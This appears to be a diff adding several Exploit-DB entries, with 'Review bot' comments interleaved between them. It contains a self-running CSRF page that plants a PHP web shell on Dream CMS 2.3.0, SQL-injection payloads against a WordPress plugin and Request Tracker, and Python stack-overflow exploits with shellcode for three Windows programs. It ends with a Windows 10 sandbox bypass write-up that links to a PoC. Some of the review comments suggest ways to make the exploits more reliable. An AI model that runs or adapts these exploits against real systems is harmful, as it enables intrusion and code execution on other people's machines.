http://www.example.com/AI-BOLIT-REPORT-<date>-< time>.html
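Review bot: the placeholder `< time>` in the report URL has a stray space (`<date>-<time>` is presumably meant), and the entry does not say which Aibolit versions leave the `AI-BOLIT-REPORT-*.html` scan report under the web root; add both so readers know when the report needs to be removed or the path access-controlled after a scan.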
125
platforms/php/webapps/38446.html
Executable file
@ -0,0 +1,125 @@
<!--

Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution


Vendor: Dream CMS
Product web page: http://www.dream-cms.kg
Affected version: 2.3.0

Summary: DreamCMS is open and completely free PHP web application
for constructing websites of any complexity.

Desc: Dream CMS allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be
exploited to perform certain actions with administrative privileges if a
logged-in user visits a malicious web site. Related to the CSRF issue, an
authenticated arbitrary PHP code execution exist. The vulnerability is caused
due to the improper verification of uploaded files in '/files-manager-administration/add-file'
script via the 'file' POST parameter which allows of arbitrary files being
uploaded in '/resource/filemanager/1/home/' where the admin first needs to add
the file extension in the allowed list (csrf'd). This can be exploited to execute
arbitrary PHP code by uploading a malicious PHP script file and execute system
commands.

Tested on: nginx/1.6.2
PHP/5.5.28


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience


Advisory ID: ZSL-2015-5268
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5268.php


01.10.2015

-->


<html>
<head>
<title>Dream CMS 2.3.0 CSRF Add Extension And File Upload PHP Code Execution</title>
</head>

<body onload="exploitrun();">

<!-- 1. Add PHP allowed extension -->
<form name="addext" action="http://TARGET/pages/en/files-manager-administration/settings" method="POST" target="frame0">
<input type="hidden" name="form_name" value="settings" />
<input type="hidden" name="file_manager_allowed_extensions" value="bmp,gif,jpg,png,mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv,zip,rar,txt,doc,docx,pdf,php" />
<input type="hidden" name="file_manager_allowed_size" value="2097152" />
<input type="hidden" name="file_manager_file_name_length" value="20" />
<input type="hidden" name="file_manager_image_extensions" value="bmp,gif,jpg,png" />
<input type="hidden" name="file_manager_media_extensions" value="mp3,wav,wma,3g2,3gp,avi,flv,mov,mp4,mpg,swf,vob,wmv" />
<input type="hidden" name="file_manager_window_width" value="60" />
<input type="hidden" name="file_manager_window_height" value="500" />
<input type="hidden" name="file_manager_window_image_height" value="300" />
<input type="hidden" name="submit" value="Save" />
</form>

<!-- 2. Upload PHP file -->
<script>
function upload()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http://TARGET/pages/en/files-manager-administration/add-file?path=home", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryuCEcIcPhpF3WD8Sv");
xhr.withCredentials = true;
var body = "------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"form_name\"\r\n" +
"\r\n" +
"file\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"file\"; filename=\"billy.php\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\x3c?php\r\n" +
"system($_GET[\"cmd\"]);\r\n" +
"?\x3e\r\n" +
"\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv\r\n" +
"Content-Disposition: form-data; name=\"submit\"\r\n" +
"\r\n" +
"Submit\r\n" +
"------WebKitFormBoundaryuCEcIcPhpF3WD8Sv--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>

<form name="uploadme" action="javascript:upload();" target="frame1">
</form>

<!-- 3. Code execution -->
<form name="exploit" action="http://TARGET/resource/filemanager/1/home/billy.php" method="GET" target="frame2">
<input type="hidden" name="cmd" value="whoami" />
</form>

<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>

<script>
function exploitrun()
{
document.addext.submit();
document.getElementsByTagName("iframe")[0].onload = function()
{
document.uploadme.submit();
document.getElementsByTagName("iframe")[1].onload = function()
{
document.exploit.submit();
}
}
}
</script>

</body>
</html>
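Review bot: step 3 is chained on `frame1`'s `onload`, but `upload()` issues an asynchronous request (`xhr.open(..., true)`) and nothing waits for it to finish, so `document.exploit.submit()` can fire before the upload has completed; trigger the last step from `xhr.onload` inside `upload()` rather than from the iframe's load event. The `aBody[i] = body.charCodeAt(i)` copy truncates any code point above 255, which is harmless only because the multipart body is pure ASCII. On the vendor side the description already implies the fix: a per-request anti-CSRF token on both `/files-manager-administration/settings` and `add-file`, and, independently, not serving uploads under `/resource/filemanager/` as executable PHP whatever the allowed-extensions setting says.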
9
platforms/php/webapps/38458.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59021/info

Spider Video Player plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Spider Video Player 2.1 is vulnerable; other versions may also be affected.

http://www.example.com/wp-content/plugins/player/settings.php?playlist=[num]&theme=[SQL]
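Review bot: the PoC line gives the parameter (`theme`) but not whether `settings.php` is reachable without a WordPress login or which plugin release fixed it; both change how the entry is triaged and should be taken from the linked BID 59021. The stated root cause, unsanitized input used directly in a query, is addressed by binding `theme` through `$wpdb->prepare()` rather than by filtering the value.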
21
platforms/php/webapps/38459.txt
Executable file
@ -0,0 +1,21 @@
source: http://www.securityfocus.com/bid/59022/info

Request Tracker is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

RT 4.0.10 is vulnerable; other versions may also be affected.

POST /Approvals/ HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Cookie: RT_SID_example.com.80=7c120854a0726239b379557f024cc1cb
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.example.com/Approvals/
Host: 10.10.10.70
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64;
Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR
3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Content-Length: 120

ShowPending=1%27+and+%27f%27%3D%27f%27%29+--+&ShowResolved=1&ShowRejected=1&ShowDependent=1&CreatedBefore=&CreatedAfter=
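Review bot: the capture has `Host: 10.10.10.70` but `Referer: http://www.example.com/Approvals/`; pick one so the request replays consistently. The `Cookie: RT_SID_...` header shows the injection needs an authenticated RT session, which the prose should say explicitly since it limits who can reach the sink. `Content-Length: 120` does match the body shown. The `User-Agent` value is folded across three lines, which is valid HTTP/1.0 header folding but trips some replay tools; joining it onto one line avoids that.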
41
platforms/windows/local/38456.py
Executable file
@ -0,0 +1,41 @@
# Exploit Title: Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow
# Date: 10/13/2015
# Exploit Author: ArminCyber
# Contact: Armin.Exploit@gmail.com
# Version: 1.1
# Tested on: XP SP3 EN
# Description: A malicious .aiff file cause this vulnerability.
# category: Local Exploit


f = open("malicious.aiff", "w")

f.write("A"*4132)

f.write("\xeb\x06\x90\x90")

f.write("\xa4\x43\x40\x00")

# Shelcode:
# windows/exec - 277 bytes
# CMD=calc.exe
f.write("\x90"*20)
f.write("\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
"\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
"\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
"\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
"\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
"\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
"\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
"\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
"\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
"\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
"\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
"\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
"\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
"\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
"\xc4\xd9")
f.write("\x90"*20)

f.close()
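Review bot: `open("malicious.aiff", "w")` is text mode; on Windows any `\x0a` byte in the payload would be rewritten as `\r\n` and shift every offset after it, so the file should be opened with `"wb"` (the current bytes happen to contain no `\x0a`, which is why it works today). The comment says `windows/exec - 277 bytes` but the string literal holds 227 bytes (fifteen lines of 15 plus a final 2), and `Shelcode` is misspelled. The title names a WAV to MP3 converter while the trigger file is `.aiff`; the description should say explicitly that the AIFF import path is the one affected.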
147
platforms/windows/local/38467.py
Executable file
@ -0,0 +1,147 @@
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-ADOBE-WRKGRP-BUFFER-OVERFLOW.txt


Vendor:
================================
www.adobe.com


Product:
=================================
AdobeWorkgroupHelper.exe v2.8.3.3
Part of Photoshop 7.0 circa 2002


Vulnerability Type:
===========================
Stack Based Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================

AdobeWorkgroupHelper.exe is a component of the Photoshop 7 workgroup
functionality, that lets users work with files on a server that is
registered as a workgroup.
If AdobeWorkgroupHelper.exe is called with an overly long command line
argument it is vulnerable to a stack based buffer overflow exploit.

Resluting in arbitrary code execution undermining the integrity of the
program. We can control EIP register at about 5,856 bytes, our shellcode
will point
to ECX register.

Tested successfully on Windows 7 SP1


Exploit code(s):
===============

Use below python script to exploit...
'''

import struct,os,subprocess

#Photoshop 7 AdobeWorkgroupHelper.exe buffer overflow exploit
#Tested Windows 7 SP1
#------------------------------------
#by hyp3rlinx - apparitionsec@gmail.com
#hyp3rlinx.altervista.org
#==============================================================
#
#0x618b19f7 : call ecx | {PAGE_EXECUTE_READ} [ARM.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.8.3.3
#(C:\Program Files (x86)\Common Files\Adobe\Workflow\ARM.dll)
#===============================================================

'''
Quick Register dump...

EAX 00270938
ECX 00270A7C <---------------BOOM!
EDX 00A515FC ASCII "AAAAAA..."
EBX 41414140
ESP 0018FEB0
EBP 0018FED0
ESI 00000000
EDI 41414141
EIP 004585C8 AdobeWor.004585C8
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010202 (NO,NB,NE,A,NS,PO,GE,G)

'''


#shellcode to pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\Program Files (x86)\Common
Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "

#payload="A"*5852+"R"*4 #<---- control EIP register

#our shellcode will point at ECX register, so we need to find an JMP or
CALL ECX and point EIP to that address
#where our malicious code resides, we find it in ARM.dll

eip=struct.pack('<L', 0x618B19F7) #CALL ECX ARM.dll v2.8.3.3
payload="A"*5852+eip+"\x90"*20+sc #<----- direct EIP overwrite BOOOOOM!!!

subprocess.Popen([vulnpgm, payload], shell=False)


'''
Disclosure Timeline:
=========================================================
Vendor Notification: August 31, 2015
October 12, 2015 : Public Disclosure


Exploitation Technique:
=======================
Local


Severity Level:
=========================================================
Med


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.

by hyp3rlinx
'''
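Review bot: the script as committed does not parse: the `vulnpgm` string literal is broken across two lines (`vulnpgm="C:\Program Files (x86)\Common` / `Files\Adobe\Workflow\AdobeWorkgroupHelper.exe "`), and the comment starting `#our shellcode will point at ECX register` continues on a line with no `#` (`CALL ECX and point EIP to that address`); both look like mail line-wrapping and should be rejoined. The trailing space in the executable path should also go, since `subprocess.Popen([vulnpgm, payload], shell=False)` passes it verbatim as the program name. `Resluting` in the details block is a typo. The `#ASLR: False, Rebase: False` line is what justifies a fixed `0x618B19F7` gadget address and is worth keeping next to `eip=` rather than in the header block.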
118
platforms/windows/local/38472.py
Executable file
@ -0,0 +1,118 @@
'''
[+] Credits: hyp3rlinx

[+] Website: hyp3rlinx.altervista.org

[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-BLAT-MAILER-BUFFER-OVERFLOW.txt


Vendor:
================================
www.blat.net
http://sourceforge.net/projects/blat/


Product:
================================
Blat v2.7.6

blat.exe is a Win32 command line eMail tool
that sends eMail using SMTP or post to usenet using NNTP.


Vulnerability Type:
=====================
Stack Buffer Overflow


CVE Reference:
==============
N/A


Vulnerability Details:
=====================
An older release of blat.exe v2.7.6 is prone to a stack based buffer
overflow when sending
malicious command line arguments, we need to send two arguments first
can be whatever e.g. "AAAA"
then second argument to trigger the buffer overflow and execute
arbitrary code on the victims OS.


Stack dump...


EAX 00000826
ECX 0018E828 ASCII "Blat saw and processed these options, and was
confused by the last one...
AAAAAAA...
EDX 0008E3C8
EBX 000000E1
ESP 0018F05C ASCII "AAAAA...
EBP 41414141
ESI 00426E88 blat.00426E88
EDI 00272FD8
EIP 41414141 <-------------- BOOM!

C 0 ES 002B 32bit 0(FFFFFFFF)
P 1 CS 0023 32bit 0(FFFFFFFF)
A 0 SS 002B 32bit 0(FFFFFFFF)
Z 1 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)


Exploit code(s):
===============

Python script to exploit...
'''

import struct,os,subprocess


#pop calc.exe Windows 7 SP1
sc=("\x31\xF6\x56\x64\x8B\x76\x30\x8B\x76\x0C\x8B\x76\x1C\x8B"
"\x6E\x08\x8B\x36\x8B\x5D\x3C\x8B\x5C\x1D\x78\x01\xEB\x8B"
"\x4B\x18\x8B\x7B\x20\x01\xEF\x8B\x7C\x8F\xFC\x01\xEF\x31"
"\xC0\x99\x32\x17\x66\xC1\xCA\x01\xAE\x75\xF7\x66\x81\xFA"
"\x10\xF5\xE0\xE2\x75\xCF\x8B\x53\x24\x01\xEA\x0F\xB7\x14"
"\x4A\x8B\x7B\x1C\x01\xEF\x03\x2C\x97\x68\x2E\x65\x78\x65"
"\x68\x63\x61\x6C\x63\x54\x87\x04\x24\x50\xFF\xD5\xCC")

vulnpgm="C:\\blat276\\full\\blat.exe "
eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll

payload="A"*2018+eip+"\x90"*20+sc
subprocess.Popen([vulnpgm, "A"*4, payload], shell=False)


'''
Disclosure Timeline:
=========================================================
Oct 14, 2015 : Public Disclosure


Severity Level:
=========================================================
Med


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that
due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given
to the author.
The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security
related information or exploits by the author or elsewhere.

by hyp3rlinx
'''
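Review bot: `eip=struct.pack('<L', 0x776D0115) #<--- JMP ESP kernel32.dll` relies on a kernel32.dll address, and on Windows 7 that module is randomised per boot and moves with patch level, so the value is specific to the author's machine; unlike the non-ASLR ARM.dll gadget in 38467.py it should be labelled with the exact kernel32 build it came from. The heading `Stack dump...` sits above what is a register dump, and the trailing space in `vulnpgm="C:\\blat276\\full\\blat.exe "` is passed verbatim to `subprocess.Popen` as the program name and should be removed.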
52
platforms/windows/local/38474.txt
Executable file
@ -0,0 +1,52 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=486

Windows: Sandboxed Mount Reparse Point Creation Mitigation Bypass
Platform: Windows 10 (build 10240), earlier versions do not have the functionality
Class: Security Feature Bypass

Summary:
A mitigation added to Windows 10 to prevent NTFS Mount Reparse Points being created at integrity levels below medium can be bypassed.

Description:

Windows 10 has added some new mitigations to block the creation or change the behaviour of certain symbolic links when issued by a low integrity/sandboxed process. The presumed aim to to make it harder to abuse these types of tricks to break out of a sandbox.

In earlier builds on Windows 10 NTFS Mount Reparse Points were blocked outright from a sandboxed process, however in 10240 (what can only be assumed a final build) the check was moved to the kernel in IopXXXControlFile and changed slightly so that sandboxed processes could create some mount points. The check is roughly:

if (RtlIsSandboxedProcess()) {
if(ControlCode == FSCTL_SET_MOUNT_POINT) {
if (FsRtlValidateReparsePointBuffer(buffer) && buffer->ReparseTag == TAG_MOUNT_POINT) {
NTSTATUS status = ZwOpenFile(..., buffer->ReparseTarget, FILE_GENERIC_WRITE, ... , FILE_DIRECTORY_FILE);
if (!NT_SUCCESS(status)) {
return status;
}
}
}

The kernel is therefore checking that the target of the mount point is a directory and that the current process has write access to the directory. This would sufficiently limit the ability of a sandboxed process to abuse this to write files at a higher privilege. Unfortunately there’s a perhaps unexpected problem with this check, the sandboxed process can redirect the ZwOpenFile call arbitrarily to something it can open for write, yet the original value is set as the mount point. This is because the file open check is being made inside the process which is doing the call which means it honours the user’s device mapping.

While the sandboxed process cannot change the per-user drive mappings, it can change the process’s device map using NtSetInformationProcess with the ProcessDeviceMap information class. As we can create arbitrary object directories and symbolic links (which while they also have a mitigation it only prevents a higher privilege process following them, which we don’t care about) we can build a completely fake device map which redirects the open to another directory. A good target turns out to be \Device\NamedPipe\ (note the trailing slash) as that can be opened from any privilege level (including Chrome renderer processes) for write access and as a directory. So if we want to set an arbitrary mount point to say \??\c:\somewhere we can build something like:

<UNNAMED>(DIR) -> C:(DIR) -> somewhere(LINK to \Device\NamedPipe\)

If we set the unnamed directory to the process device map we can bypass the check and create the mount point.

Perhaps from a fix perspective you could query for the opened path and use that to write to the NTFS reparse point rather than using the original value.

Proof of Concept:

I’ve provided a PoC which will demonstrate the bypass. It should be executed at low integrity using psexec or modifying the executable file’s ACL to low. Ensure you use the correct version for the architecture on Windows, as there seems to be a bug in NtSetInformationProcess which blocks Wow64 apps from setting the process device map. You can compare the operation to the command shell’s mklink tool that will fail to create the mount point at low integrity. The archive password is ‘password’. Follow these steps:

1) Extract the PoC to a location on a local hard disk which is writable by a normal user.
2) Execute the poc executable file as low integrity passing two arguments, the path to a directory to create (must be somewhere than can be written to as low integrity user such as AppData\Temp\Low) and the arbitrary file path to set the mount point to. For example:
poc.exe c:\users\user\appdata\local\low\abc c:\notreal.

Expected Result:
It shouldn’t be possible to create a mount point pointed at a location not writable by low integrity user

Observed Result:
The mount point is created successfully.


Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38474.zip
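Review bot: the kernel check excerpt opens four `{` blocks (`RtlIsSandboxedProcess()`, `ControlCode == FSCTL_SET_MOUNT_POINT`, `FsRtlValidateReparsePointBuffer(buffer) && ...`, `!NT_SUCCESS(status)`) but closes only three, so one closing brace is missing at the end of the snippet. `The presumed aim to to make`, `somewhere than can be written` and the duplicated `Proof of Concept:` heading are minor text issues. The substantive remediation is the one the write-up states in passing, namely writing the reparse point with the path the kernel actually opened rather than the caller-supplied `buffer->ReparseTarget`, since that is what closes the device-map redirection; it deserves its own heading rather than a single sentence mid-description.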